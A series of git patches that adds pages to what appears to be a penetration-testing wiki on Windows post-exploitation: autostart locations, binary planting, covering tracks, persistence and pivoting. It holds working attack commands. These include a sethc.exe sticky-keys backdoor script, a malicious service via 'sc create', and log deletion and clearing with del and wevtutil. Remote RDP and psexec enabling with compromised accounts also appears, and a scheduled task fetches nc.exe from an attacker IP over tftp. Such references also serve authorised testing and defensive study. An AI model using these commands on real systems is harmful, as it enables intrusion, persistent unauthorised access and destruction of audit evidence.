From a00120eaf695947d51ac4f7fa53459b13d838686 Mon Sep 17 00:00:00 2001
From: webbreacher <webbreacher@gmail.com>
Date: Sun, 29 Dec 2013 06:31:27 -0500
Subject: [PATCH 1/8] Adding the sub-file links to the index.md

---
 presence/windows/index.md | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)

diff --git a/presence/windows/index.md b/presence/windows/index.md
index d03fe86..e307ab0 100644
--- a/presence/windows/index.md
+++ b/presence/windows/index.md
@@ -1,8 +1,8 @@
-# Windows CMD Commands
+# Windows Presence Commands
 
-Command that can be executed from the context of the CMD.exe prompt.
+Command that can be executed from the context of the CMD.exe prompt that help gain insight into the configuration of the target.
 
-  * [Config Commands](windows_cmd_config.md) - Commands that display information about the configuration of the victim.
-  * [Network Commands](windows_cmd_network.md) - Commands used for gathering information about the network settings and connections of a system.
-  * [Remote Acccess Commands](windows_cmd_remote.md) - Commands to remotely administer systems.
+  * [Blind Files](blind.md) - Files to look for on the system.
+  * [Config](windows_cmd_config.md) - Commands that display information about the configuration of the victim.
+  * [Finding Files](find_files.md) - How to search for files.
 

From 2c2cbd7af2bfb06def145e80af624ca026a75fec Mon Sep 17 00:00:00 2001
From: webbreacher <webbreacher@gmail.com>
Date: Sun, 29 Dec 2013 06:31:49 -0500
Subject: [PATCH 2/8] Adding the sub-file links to the index.md

---
 presence/windows/index.md | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)

diff --git a/presence/windows/index.md b/presence/windows/index.md
index e307ab0..0743c42 100644
--- a/presence/windows/index.md
+++ b/presence/windows/index.md
@@ -4,5 +4,4 @@ Command that can be executed from the context of the CMD.exe prompt that help ga
 
   * [Blind Files](blind.md) - Files to look for on the system.
   * [Config](windows_cmd_config.md) - Commands that display information about the configuration of the victim.
-  * [Finding Files](find_files.md) - How to search for files.
-
+  * [Finding Files](find_files.md) - How to search for files.
\ No newline at end of file

From 97435c8e8d7a33450dd49d1184b722991e207da0 Mon Sep 17 00:00:00 2001
From: webbreacher <webbreacher@gmail.com>
Date: Sun, 29 Dec 2013 06:37:44 -0500
Subject: [PATCH 3/8] Changing the directory name to the correct spelling

---
 persistence/windows/autostart.md | 94 ++++++++++++++++++++++++++++++++
 persistence/windows/binary.md    | 11 ++++
 persistence/windows/cover.md     | 74 +++++++++++++++++++++++++
 persistence/windows/index.md     |  4 ++
 4 files changed, 183 insertions(+)
 create mode 100644 persistence/windows/autostart.md
 create mode 100644 persistence/windows/binary.md
 create mode 100644 persistence/windows/cover.md
 create mode 100755 persistence/windows/index.md

diff --git a/persistence/windows/autostart.md b/persistence/windows/autostart.md
new file mode 100644
index 0000000..fce7203
--- /dev/null
+++ b/persistence/windows/autostart.md
@@ -0,0 +1,94 @@
+## Windows Autostart Locations
+### Folders
+| Location | Operating System |
+| -------- | ---------------- |
+| `%SystemDrive%\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\` | Windows NT 6.0, 6.1 |
+| `%SystemDrive%\Documents And Settings\All Users\Start Menu\Programs\StartUp\` | Windows 5.0, 5.1, 5.2 |
+| `%SystemDrive%\wmiOWS\Start Menu\Programs\StartUp\` | Windows 9x |
+| `%SystemDrive%\WINNT\Profiles\All Users\Start Menu\Programs\StartUp\` | Windows NT 3.50, 3.51, 4.0 |
+| `User\Startup\` | |
+| `%windir%\Start Menu\Programs\Startup\` | |
+| `%windir%\Tasks\` | |
+| `%windir%\system\iosubsys\` | |
+| `%windir%\system\vmm32\` | |
+
+### Files
+| Location | Operating System |
+| -------- | ---------------- |
+| `%windir%\dosstart.bat` | |
+| `%windir%\system.ini` - [boot] "scrnsave.exe" | |
+| `%windir%\system.ini` - [boot] "shell" | |
+| `%windir%\system\autoexec.nt` | |
+| `%windir%\system\config.nt` | |
+| `%windir%\win.ini` - [windows] "load" | |
+| `%windir%\win.ini` - [windows] "run" | |
+| `%windir%\wininit.ini` | |
+| `%windir%\winstart.bat` | |
+| `c:\autoexec.bat` | |
+| `c:\config.sys` | |
+| `c:\explorer.exe` | |
+
+### Registry
+| Location | Function |
+| -------- | -------- |
+| `%windir%\dosstart.bat` | |
+| `HKEY_CLASSES_ROOT\batfile\shell\open\command\` | Executed whenever a .BAT file (Batch Command) is run. |
+| `HKEY_CLASSES_ROOT\comfile\shell\open\command\` | Executed whenever a .COM file (Command) is run. |
+| `HKEY_CLASSES_ROOT\exefile\shell\open\command\` | Executed whenever a .EXE file (Executable) is run. |
+| `HKEY_CLASSES_ROOT\jsefile\shell\open\command\` | Executed whenever a .JSE file (Encoded Javascript) is run. |
+| `HKEY_CLASSES_ROOT\jsfile\shell\open\command\` | Executed whenever a .JS file (Javascript) is run. |
+| `HKEY_CLASSES_ROOT\piffile\shell\open\command\` | Executed whenever a .PIF file (Portable Interchange Format) is run. |
+| `HKEY_CLASSES_ROOT\scrfile\shell\open\command\` | Executed whenever a .SCR file (Screen Saver) is run. |
+| `HKEY_CLASSES_ROOT\vbefile\shell\open\command\` | Executed whenever a .VBE file (Encoded Visual Basic Script) is run. |
+| `HKEY_CLASSES_ROOT\vbsfile\shell\open\command\` | Executed whenever a .VBS file (Visual Basic Script) is run. |
+| `HKEY_CLASSES_ROOT\wsffile\shell\open\command\` | Executed whenever a .WSF file (Windows Scripting File) is run. |
+| `HKEY_CLASSES_ROOT\wshfile\shell\open\command\` | Executed whenever a .WSH file (Windows Scripting Host) is run. |
+| `HKEY_CURRENT_USER\Control Panel\Desktop` | The "SCRNSAVE.EXE" value is monitored. This value is launched when your screen saver activates. |
+| `HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\load` | Executed when the user logs in. |
+| `HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\run` | Executed when the user logs in. |
+| `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\run\` | Subvalues are executed when Explorer initialises. |
+| `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\Setup\` | Used only by Setup. Displays a progress dialog box as the keys are run one at a time. |
+| `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\` | All values in this key are executed, and then their autostart reference is deleted. |
+| `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\` | All values in this key are executed. |
+| `HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\` | All subkeys are monitored, with special attention paid to the "StubPath" value in each subkey. |
+| `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit` | Executed when a user logs in. |
+| `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon` | The "Shell" value is monitored. This value is executed after you log in. |
+| `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\` | All values in this key are executed. |
+| `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\run\` | Subvalues are executed when Explorer initialises. |
+| `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce\` | All values in this key are executed, and then their autostart reference is deleted. |
+| `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce\` | All values in this key are executed as services, and then their autostart reference is deleted. |
+| `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\` | All values in this key are executed as services. |
+| `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\` | Executed by explorer.exe as soon as it has loaded. |
+| `HKEY_LOCAL_MACHINE\System\Control\WOW\cmdline` | Executed when a 16-bit Windows executable is executed. |
+| `HKEY_LOCAL_MACHINE\System\Control\WOW\wowcmdline` | Executed when a 16-bit DOS application is executed. |
+| `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager` | The "BootExecute" value is monitored. Files listed here are Native Applications that are executed before Windows starts. |
+| `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\` | All subkeys are monitored, with special attention paid to the "StaticVXD" value in each subkey. |
+| `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Winsock2\Parameters\Protocol_Catalog\Catalog_En tries\` | Layered Service Providers, executed before user login. |
+| `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\` | Services marked to startup automatically are executed before user login. |
+| `HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\RunOnce\` | Similar to the RunOnce key from HKEY_CURRENT_USER. |
+| `HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Run\` | Similar to the Run key from HKEY_CURRENT_USER. |
+
+
+## Windows Operating System Versions
+From http://msdn.microsoft.com/en-us/library/windows/desktop/ms724832(v=vs.85).aspx:
+
+The following table summarizes the most recent operating system version numbers.
+
+| Operating system | Version number |
+| ---------------- | -------------- |
+| Windows 8.1 | 6.3 |
+| Windows Server 2012 R2 | 6.3 |
+| Windows 8 | 6.2 |
+| Windows Server 2012 | 6.2 |
+| Windows 7 | 6.1 |
+| Windows Server 2008 R2 | 6.1 |
+| Windows Server 2008 | 6.0 |
+| Windows Vista | 6.0 |
+| Windows Server 2003 R2 | 5.2 |
+| Windows Server 2003 | 5.2 |
+| Windows XP 64-Bit Edition | 5.2 |
+| Windows XP | 5.1 |
+| Windows 2000 | 5.0 |
+
+## References
+A large portion of this content came from https://web.archive.org/web/20110203184210/http://www.easy-data.no/Autostart.html
diff --git a/persistence/windows/binary.md b/persistence/windows/binary.md
new file mode 100644
index 0000000..c5a7abd
--- /dev/null
+++ b/persistence/windows/binary.md
@@ -0,0 +1,11 @@
+# Windows Binary Planting
+
+Binary Planting is essentially putting binary is a specific place, be it moved, copied or uploaded to create the desired effect. In this section we'll be going over the use of binary planting to escalate privileges.
+
+| Command | Description / Importance |
+| ------- | ------------------------ |
+| `%SystemRoot%\System32\wbem\mof\` | Taken from Stuxnet: http://blogs.iss.net/archive/papers/ibm-xforce-an-inside-look-at-stuxnet.pdf Look for Print spooler vulnerability. |
+| `echo $PATH` | Check the $PATH environmental variable. Some directories may be writable. See: https://www.htbridge.com/advisory/HTB23108 |
+| `msiexec.exe` | Idea taken from here: http://goo.gl/E3LTa - basically put evil binary named msiexec.exe in Downloads directory and when a installer calles msiexec without specifying path you get code execution. |
+| `sc create cmdsys type= own type= interact binPath= "c:\windows\system32\cmd.exe /c cmd.exe" & sc start cmdsys` | Create malicious services. |
+|<code>Replacing file as: sethc.exe<br>@echo off <br>c: > nul\\cd\ > nul\\cd %SYSTEMROOT%\System32\ > nul <br>if exist %SYSTEMROOT%\System32\cmdsys\ rd /q %SYSTEMROOT%\System32\cmdsys\ > nul <br>cmd %SYSTEMROOT%\System32\cmdsys\ > nul <br>copy /y c:\windows\system32\cmd.exe c:\windows\system32\cmdsys\cmd.bkp /y > nul <br>copy /y c:\windows\system32\sethc.exe c:\windows\system32\cmdsys\sethc.bkp /y > nul <br>copy /y c:\windows\system32\cmd.exe c:\windows\system32\cmdsys\sethc.exe /y > nul <br>copy /y c:\windows\system32\cmdsys\sethc.exe c:\windows\system32\sethc.exe /y > nul<br>exit</code> | By doing this, you just have to press the sticky key activation key. From Wikipedia.org: To enable this shortcut, the ?Shift key must be pressed 5 times in short succession. This feature can also be turned on and off via the Accessibility icon in the Windows Control Panel. To turn off once enabled, just simply press 3 or more of the Sticky Keys (Ctrl, Alt, Shift, Windows Button) at the same time. |
\ No newline at end of file
diff --git a/persistence/windows/cover.md b/persistence/windows/cover.md
new file mode 100644
index 0000000..8cb0657
--- /dev/null
+++ b/persistence/windows/cover.md
@@ -0,0 +1,74 @@
+<!-- Code for collapse and expand -->
+<script type="text/javascript"> 
+$(document).ready(function() { 
+$('div.view').hide(); 
+$('div.slide').click(function() {
+$(this).next('div.view').slideToggle('fast'); 
+return false; 
+}); 
+}); 
+</script>
+
+# Windows Covering Tracks Commands
+
+Commands to run to clean up a system after you have exploited it and to reduce a target's ability to discover what you did while on their system and are usually executed from the context of the `cmd.exe` or `command.exe` prompt.
+
+## del
+### Delete Logs
+ * **Command with arguments**: `del %WINDIR%\*.log /a /s /q /f`
+ * **Description**: **MUST be run as an administrator**. Deletes all *.log files from the %WINDIR% directory.
+ * **Output**:
+   * NA
+
+----
+
+## wevtutil
+### List Logs
+ * **Command with arguments**: `wevutil el`
+ * **Description**: Lists the different log files the system is keeping. More information can be found http://technet.microsoft.com/en-us/library/cc732848(WS.10).aspx
+ * **Output**:
+   * <div class="slide" style="cursor: pointer;"> **Windows 2008:** Show/Hide</div><div class="view"><code>C:\Users\johndoe>wevtutil el
+Application
+DFS Replication
+Directory Service
+DNS Server
+File Replication Service
+HardwareEvents
+Internet Explorer
+Key Management Service
+Security
+System
+ThinPrint Diagnostics
+EndpointMapper
+ForwardedEvents
+Microsoft-Windows-ADSI/Debug
+Microsoft-Windows-Bits-Client/Analytic
+Microsoft-Windows-Bits-Client/Operational
+Microsoft-Windows-CAPI2/Operational
+Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational
+Microsoft-Windows-CodeIntegrity/Operational
+Microsoft-Windows-CodeIntegrity/Verbose
+Microsoft-Windows-COM/Analytic
+Microsoft-Windows-CorruptedFileRecovery-Client/Operational
+Microsoft-Windows-CorruptedFileRecovery-Server/Operational
+Microsoft-Windows-CredUI/Diagnostic
+Microsoft-Windows-DateTimeControlPanel/Analytic
+Microsoft-Windows-DateTimeControlPanel/Debug
+Microsoft-Windows-DateTimeControlPanel/Operational
+Microsoft-Windows-DCLocator/Debug
+Microsoft-Windows-Diagnosis-DPS/Analytic
+Microsoft-Windows-Diagnosis-DPS/Debug
+Microsoft-Windows-Diagnosis-DPS/Operational
+Microsoft-Windows-Diagnosis-MSDT/Debug
+Microsoft-Windows-Diagnosis-MSDT/Operational
+Microsoft-Windows-Diagnosis-PLA/Debug
+Microsoft-Windows-Diagnosis-PLA/Operational
+Microsoft-Windows-Diagnosis-WDI/Debug
+Microsoft-Windows-Diagnostics-Networking/Debug
+[...snip...]</code></div> 
+
+### Clear Logs
+ * **Command with arguments**: `wevtutil cl [LOGNAME]`
+ * **Description**: **MUST be run as an administrator**.  Clears the contents of a specific log.
+ * **Output**:
+   * <div class="slide" style="cursor: pointer;"> **Windows 2008:** Show/Hide</div><div class="view"><code>c:\temp>wevtutil cl Microsoft-Windows-EventLog/Debug</code></div> 
\ No newline at end of file
diff --git a/persistence/windows/index.md b/persistence/windows/index.md
new file mode 100755
index 0000000..03274f3
--- /dev/null
+++ b/persistence/windows/index.md
@@ -0,0 +1,4 @@
+# Windows Persistence Commands
+
+Commands that help you maintain control over a compromised system.
+

From 18dbab0cbf8a270bea39df96ee666ab0c6a84459 Mon Sep 17 00:00:00 2001
From: webbreacher <webbreacher@gmail.com>
Date: Sun, 29 Dec 2013 06:40:45 -0500
Subject: [PATCH 4/8] Adding entries for sub-pages

---
 persistence/windows/index.md | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/persistence/windows/index.md b/persistence/windows/index.md
index 03274f3..d31bcf0 100755
--- a/persistence/windows/index.md
+++ b/persistence/windows/index.md
@@ -2,3 +2,6 @@
 
 Commands that help you maintain control over a compromised system.
 
+  * [Autostart Locations](autostart.md) - Where are the locations that will cause some command to auto-start on boot.
+  * [Binary Planting](binary.md) - Putting binary files in certain places.
+  * [Covering Tracks](cover.md) - Covering your tracks.
\ No newline at end of file

From 7ec6e3ae60d3868992a448ccaae721cf92521a86 Mon Sep 17 00:00:00 2001
From: webbreacher <webbreacher@gmail.com>
Date: Sun, 29 Dec 2013 07:03:39 -0500
Subject: [PATCH 5/8] Adding new general file and the index file. Chmod'd to
 not be executable

---
 persistence/windows/general.md | 58 ++++++++++++++++++++++++++++++++++
 persistence/windows/index.md   |  3 +-
 2 files changed, 60 insertions(+), 1 deletion(-)
 create mode 100644 persistence/windows/general.md
 mode change 100755 => 100644 persistence/windows/index.md

diff --git a/persistence/windows/general.md b/persistence/windows/general.md
new file mode 100644
index 0000000..2b35690
--- /dev/null
+++ b/persistence/windows/general.md
@@ -0,0 +1,58 @@
+<!-- Code for collapse and expand -->
+<script type="text/javascript"> 
+$(document).ready(function() { 
+$('div.view').hide(); 
+$('div.slide').click(function() {
+$(this).next('div.view').slideToggle('fast'); 
+return false; 
+}); 
+}); 
+</script>
+
+# Windows General Persistence Commands
+
+Commands to run to maintain persistence after you have exploited it and are usually executed from the context of the `cmd.exe` or `command.exe` prompt.
+
+
+### Enable `psexec`
+ * The [`psexec` tool](http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx) executes processes on other systems over a network. Most systems now disable the "clipbook" which `psexec` required. According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 50)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can re-enable the sub-systems needed to use `psexec` using the `sc` commands below.
+
+    `` c:\> net use \\target\ipc$ username /user:password
+    c:\> sc \\target config netdde start= auto
+    c:\> sc \\target config netddedsdm start= auto
+    c:\> sc \\target config clipsrv start= auto
+    c:\> sc \\target start netdde
+    c:\> sc \\target start netddedsdm
+    c:\> sc \\target start clipsrv
+    ``
+
+### Enable Remote Desktop
+ * Remote Desktop allows a remote user to receive a graphical "desktop" of the target (compromised) system. According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 53)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can remotely enable remote desktop using the commands below.
+
+  1. Create a file named `fix_ts_policy.ini` containing the contents below. Change the *"hacked_account"* value to the account you have compromised on the remote system.
+
+     <pre>
+     [Unicode]
+         Unicode=yes
+         [Version]
+         signature="$CHICAGO$"
+         Revision=1
+         [Privilege Rights] [Privilege Rights]
+         seremoteinteractivelogonright = hacked_account
+         seinteractivelogonright = hacked_account
+         sedenyinteractivelogonright =
+         sedenyremoteinteractivelogonright =
+         sedenynetworklogonright =
+     </pre>
+
+  1. Create another file named `enable_ts.reg` containing the contents below. 
+
+     <pre>
+     Windows Registry Editor Version 5.00
+     [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
+     "fDenyTSConnections"=dword:00000000
+     "TSEnabled"=dword:00000001
+     "TSUserEnabled"=dword:00000000
+     </pre>
+
+  1. 
\ No newline at end of file
diff --git a/persistence/windows/index.md b/persistence/windows/index.md
old mode 100755
new mode 100644
index d31bcf0..9ef9d53
--- a/persistence/windows/index.md
+++ b/persistence/windows/index.md
@@ -4,4 +4,5 @@ Commands that help you maintain control over a compromised system.
 
   * [Autostart Locations](autostart.md) - Where are the locations that will cause some command to auto-start on boot.
   * [Binary Planting](binary.md) - Putting binary files in certain places.
-  * [Covering Tracks](cover.md) - Covering your tracks.
\ No newline at end of file
+  * [Covering Tracks](cover.md) - Covering your tracks.
+  * [General Commands](general.md) - Commands your could/should use to maintain your hold on the compromised system.
\ No newline at end of file

From 44dd8b08ff20aaebb9009e95990b65c791d26ca4 Mon Sep 17 00:00:00 2001
From: webbreacher <webbreacher@gmail.com>
Date: Sun, 29 Dec 2013 07:12:43 -0500
Subject: [PATCH 6/8] Finished adding some content to the remote desktop and
 psexec sections

---
 persistence/windows/general.md | 45 ++++++++++++++++++++--------------
 1 file changed, 27 insertions(+), 18 deletions(-)

diff --git a/persistence/windows/general.md b/persistence/windows/general.md
index 2b35690..802c62b 100644
--- a/persistence/windows/general.md
+++ b/persistence/windows/general.md
@@ -15,23 +15,23 @@ Commands to run to maintain persistence after you have exploited it and are usua
 
 
 ### Enable `psexec`
- * The [`psexec` tool](http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx) executes processes on other systems over a network. Most systems now disable the "clipbook" which `psexec` required. According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 50)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can re-enable the sub-systems needed to use `psexec` using the `sc` commands below.
-
-    `` c:\> net use \\target\ipc$ username /user:password
-    c:\> sc \\target config netdde start= auto
-    c:\> sc \\target config netddedsdm start= auto
-    c:\> sc \\target config clipsrv start= auto
-    c:\> sc \\target start netdde
-    c:\> sc \\target start netddedsdm
-    c:\> sc \\target start clipsrv
-    ``
+The [`psexec` tool](http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx) executes processes on other systems over a network. Most systems now disable the "clipbook" which `psexec` required. According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 50)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can re-enable the sub-systems needed to use `psexec` using the `sc` commands below.
+    
+``c:\> net use \\target\ipc$ username /user:password
+c:\> sc \\target config netdde start= auto
+c:\> sc \\target config netddedsdm start= auto
+c:\> sc \\target config clipsrv start= auto
+c:\> sc \\target start netdde
+c:\> sc \\target start netddedsdm
+c:\> sc \\target start clipsrv
+``
 
 ### Enable Remote Desktop
- * Remote Desktop allows a remote user to receive a graphical "desktop" of the target (compromised) system. According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 53)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can remotely enable remote desktop using the commands below.
+Remote Desktop allows a remote user to receive a graphical "desktop" of the target (compromised) system. According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 53)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can remotely enable remote desktop using the commands below.
 
-  1. Create a file named `fix_ts_policy.ini` containing the contents below. Change the *"hacked_account"* value to the account you have compromised on the remote system.
+ 1. On the compromised system, create a file named `fix_ts_policy.ini` containing the contents below. Change the *"hacked_account"* value to the account you have compromised on the remote system.
 
-     <pre>
+    <pre>
      [Unicode]
          Unicode=yes
          [Version]
@@ -43,16 +43,25 @@ Commands to run to maintain persistence after you have exploited it and are usua
          sedenyinteractivelogonright =
          sedenyremoteinteractivelogonright =
          sedenynetworklogonright =
-     </pre>
+    </pre>
 
-  1. Create another file named `enable_ts.reg` containing the contents below. 
+ 1. Create another file named `enable_ts.reg` containing the contents below. 
 
-     <pre>
+    <pre>
      Windows Registry Editor Version 5.00
      [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
      "fDenyTSConnections"=dword:00000000
      "TSEnabled"=dword:00000001
      "TSUserEnabled"=dword:00000000
-     </pre>
+    </pre>
 
-  1. 
\ No newline at end of file
+ 1. On the remote system, execute the following commands:
+      
+    ``c:\> sc config termservice start= auto sc config termservice start= auto
+c:\> regedit /s enable_ts.reg
+c:\> copy c:\windows\security\database\secedit.sdb c:\windows\security\database\new.secedit.sdb
+c:\> copy c:\windows\security\database\secedit.sdb c:\windows\security\database\orig.secedit.sdb
+c:\> secedit /configure /db new.secedit.sdb /cfg fix_ts_policy.ini
+c:\> gpupdate /Force
+c:\> net start "terminal services"
+``
\ No newline at end of file

From 85e83e9a0220c17309d99e28228280a611fcd783 Mon Sep 17 00:00:00 2001
From: webbreacher <webbreacher@gmail.com>
Date: Sun, 29 Dec 2013 10:40:11 -0500
Subject: [PATCH 7/8] Adding the index.md file so you can access the sub pages

---
 pivoting/windows/index.md | 6 ++++++
 1 file changed, 6 insertions(+)
 create mode 100755 pivoting/windows/index.md

diff --git a/pivoting/windows/index.md b/pivoting/windows/index.md
new file mode 100755
index 0000000..1d08d04
--- /dev/null
+++ b/pivoting/windows/index.md
@@ -0,0 +1,6 @@
+# Windows Pivoting Commands
+
+Commands that help you pivot to other systems from a compromised system.
+
+  * [Networking Commands](windows_cmd_network.md) - Gathering system information about network interfaces and such.
+  * [Remote Movement](remote.md) - Commands that move data and files between systems on a network.
\ No newline at end of file

From df440da00d6bcd2dfd79e255f932603aa3085f02 Mon Sep 17 00:00:00 2001
From: webbreacher <webbreacher@gmail.com>
Date: Sun, 29 Dec 2013 10:43:53 -0500
Subject: [PATCH 8/8] Adding more content.

---
 persistence/windows/general.md | 25 +++++++++++++++++--------
 1 file changed, 17 insertions(+), 8 deletions(-)

diff --git a/persistence/windows/general.md b/persistence/windows/general.md
index 802c62b..5717985 100644
--- a/persistence/windows/general.md
+++ b/persistence/windows/general.md
@@ -17,13 +17,13 @@ Commands to run to maintain persistence after you have exploited it and are usua
 ### Enable `psexec`
 The [`psexec` tool](http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx) executes processes on other systems over a network. Most systems now disable the "clipbook" which `psexec` required. According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 50)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can re-enable the sub-systems needed to use `psexec` using the `sc` commands below.
     
-``c:\> net use \\target\ipc$ username /user:password
-c:\> sc \\target config netdde start= auto
-c:\> sc \\target config netddedsdm start= auto
-c:\> sc \\target config clipsrv start= auto
-c:\> sc \\target start netdde
-c:\> sc \\target start netddedsdm
-c:\> sc \\target start clipsrv
+``c:\> net use \\[TargetIP]\ipc$ username /user:password
+c:\> sc \\[TargetIP] config netdde start= auto
+c:\> sc \\[TargetIP] config netddedsdm start= auto
+c:\> sc \\[TargetIP] config clipsrv start= auto
+c:\> sc \\[TargetIP] start netdde
+c:\> sc \\[TargetIP] start netddedsdm
+c:\> sc \\[TargetIP] start clipsrv
 ``
 
 ### Enable Remote Desktop
@@ -64,4 +64,13 @@ c:\> copy c:\windows\security\database\secedit.sdb c:\windows\security\database\
 c:\> secedit /configure /db new.secedit.sdb /cfg fix_ts_policy.ini
 c:\> gpupdate /Force
 c:\> net start "terminal services"
-``
\ No newline at end of file
+``
+
+### Scheduler
+The [Windows scheduler](http://support.microsoft.com/kb/313565) can be used to further compromise a system. According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 58)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can remotely schedule tasks using the commands below.
+
+``c:\> net use \\[TargetIP]\ipc$ password /user:username
+c:\> at \\[TargetIP] 12:00 pm command
+``
+
+An example you might run on the remote system might be: `at \\192.168.1.1 12:00pm tftp -I [MyIP] GET nc.exe`
\ No newline at end of file